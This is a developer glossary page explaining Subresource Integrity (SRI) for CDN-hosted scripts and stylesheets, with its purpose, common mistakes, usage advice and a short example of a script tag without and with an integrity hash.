CodeClarityLab / Glossary
Ctrl K
← CodeClarityLab Home
Browse by Category
+ added · updated 7d
⚖ Terms of Use
← Back to glossary

Subresource Integrity (SRI)

security CWE-829 OWASP A6:2021 PHP 5.0+ Intermediate

Also Known As

SRI integrity hash script integrity check

TL;DR

A browser mechanism that verifies CDN-hosted scripts and stylesheets haven't been tampered with, using a cryptographic hash in the HTML tag.

Explanation

SRI (W3C spec) adds an integrity attribute to <script> and <link> tags containing a base64-encoded SHA-256/384/512 hash of the expected file content. The browser refuses to execute or apply the resource if the downloaded content doesn't match. This prevents supply chain attacks where a CDN is compromised and serves a malicious version of a library. In PHP applications, generate SRI hashes with openssl_digest() or use build tools, and always combine SRI with crossorigin='anonymous'.

Common Misconception

Loading scripts from a reputable CDN is safe without SRI. CDNs have been compromised before — SRI ensures the browser refuses to execute a script if its content differs from the expected hash, protecting against CDN-level supply chain attacks.

Why It Matters

A compromised CDN or third-party host can silently serve malicious JavaScript to all your users — SRI hashes ensure the browser refuses to execute any modified file.

Common Mistakes

  • Adding SRI hashes once at setup but not regenerating them when the library version updates.
  • Using SRI on scripts loaded over HTTP — without HTTPS the hash check can be bypassed by MITM.
  • Not adding SRI to stylesheets — CSS can also exfiltrate data via attribute selectors.
  • Generating SRI hashes from a locally cached copy that differs from what the CDN actually serves.

Avoid When

  • Do not use SRI for first-party resources you host yourself — it adds no security benefit for resources under your own control.
  • Do not skip SRI for CDN-hosted JavaScript — a compromised CDN can inject malicious code into every page that loads it.

When To Use

  • Add integrity and crossorigin attributes to all third-party <script> and <link> tags loaded from CDNs.
  • Generate SRI hashes at build time and pin them — regenerate when updating the CDN resource version.

Code Examples

✗ Vulnerable 
<script src="https://cdn.example.com/jquery.min.js"></script>
✓ Fixed 
<script src="https://cdn.example.com/jquery.min.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous"></script>
Added 15 Mar 2026
Edited 31 Mar 2026
Views 20

Curated in Warsaw under one editorial standard. 1,444 terms, single voice.  About this reference →

Rate this term
No ratings yet
🤖 AI Guestbook educational data only
| |
Last 30 days
0 pings W 0 pings T 0 pings F 0 pings S 2 pings S 0 pings M 0 pings T 0 pings W 0 pings T 1 ping F 0 pings S 1 ping S 0 pings M 0 pings T 0 pings W 3 pings T 1 ping F 0 pings S 0 pings S 0 pings M 0 pings T 0 pings W 1 ping T 2 pings F 0 pings S 0 pings S 0 pings M 0 pings T 0 pings W 0 pings T
Agents 0
No pings yet today
No pings yesterday
Amazonbot 8 Perplexity 3 Google 2 ChatGPT 2 Ahrefs 1
Also referenced
Cross-Site Scripting (XSS) 29 Content Security Policy (CSP) 27 Supply Chain Attack 25
How they use it
crawler 14 crawler_json 2
Related categories
security 4k
DEV INTEL Tools & Severity
🟡 Medium ⚙ Fix effort: Low
⚡ Quick Fix
Add integrity="sha384-{hash}" and crossorigin="anonymous" to every <script> and <link> tag loading from a CDN — use srihash.org to generate hashes
📦 Applies To
PHP 5.0+ web
🔗 Prerequisites
🔍 Detection Hints
CDN-hosted scripts or stylesheets without integrity attribute; external resources loaded without SRI verification
Auto-detectable: ✓ Yes lighthouse owasp-zap semgrep
⚠ Related Problems
🤖 AI Agent
Confidence: Medium False Positives: Low ✓ Auto-fixable Fix: Low Context: Line
CWE-353 CWE-494
✓ schema.org compliant